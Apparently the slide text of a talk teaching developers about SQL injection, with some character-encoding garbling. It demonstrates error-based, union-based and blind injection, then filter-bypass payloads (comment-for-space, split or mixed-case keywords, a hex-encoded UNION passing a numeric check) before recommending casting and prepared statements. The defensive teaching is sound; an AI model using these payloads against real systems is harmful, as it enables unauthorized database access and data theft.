This is a talk geared towards developers who have heard of SQL Injection, but havenโt seen it in action, or are unsure about how to do anything about it. Contains demos of what SQL injection looks like, and why escaping quotes is nowhere near sufficient.
15. Easy to ๏ฌnd - just put a โ in somewhere
Very common
Usually ๏ฌltered ineffectively
Only works when you inject BEFORE a where clause
Usually patched quickly
Usually VERY easy to ๏ฌnd abuse in logs
18. Usually found the same way Error-based is
Works when you inject AFTER a where clause
Another tool in your toolbox
Depending on the page, may be able to put multiple
injections in one query!
21. Injection without seeing the output
Works by inferring data, not reading it out
Technically a timing side channel attack
Hard to ๏ฌnd (for attackers and defenders)
Annoying to exploit
Takes fooooorrrrever
Still works!
27. Lets strip spaces!
$id = escape_spaces(โ1/**/OR/**/1=1โ);
โSELECT * FROM table WHERE id = $idโ;
"SELECT * FROM table WHERE id = 1/**/OR/**/1=1โ;
/**/ comment acts like a space
28. Lets strip out SQL keywords
Donโt check for SELECT, INSERT, UNION, etc.
UN/**/ION works just as well
So does UniOn
And you probably didnโt cover all keywords
29. Check to see if โidโ is a number?
if is_numeric($_POST['id'])
9 union all (SELECT GROUP_CONCAT(schema_name) FROM
information_schema.schemata)
Convert to hexโฆ
0x3920756e696f6e20616c6c202853454c4543542047524f55505f
434f4e43415428736368656d615f6e616d65292046524f4d20696
e666f726d6174696f6e5f736368656d612e736368656d61746129
Thats a number!
31. Lets escape quotes!
$id = escape_quotes(โ1 OR 1=1โ);
"SELECT * FROM table WHERE id = $idโ;
"SELECT * FROM table WHERE id = 1 OR 1=1โ;
32. SELECT *
FROM users
WHERE id = mysql_real_escape_string(โ1 UNION SELECT id,
user_id, content, NULL FROM notes WHERE user_id = 1โ);
SELECT *
FROM users
WHERE id =1
UNION
SELECT id, user_id, content, NULL
FROM notes
WHERE user_id = 1
33. Works ok if you use single quotes around your
variables, though.
$id = escape_quotes(โ1โ OR 1=1โ);
"SELECT * FROM table WHERE id = โ$idโโ;
"SELECT * FROM table WHERE id = โ1โ OR 1=1โโ;
INVALID SQL QUERY! :D
35. Cast to int / ๏ฌoat / whatever
Only works for numbers
SELECT * FROM whatever WHERE id = โXโ;
Really solid defense when you can use it
Super easy to add in
36. Prepared Statements
SELECT * FROM users where id=? AND password=?
Canโt choose table name in this way
Some limitations with what prepared statements can do
Still could hit a buffer over๏ฌow or something
But pretty darn sturdy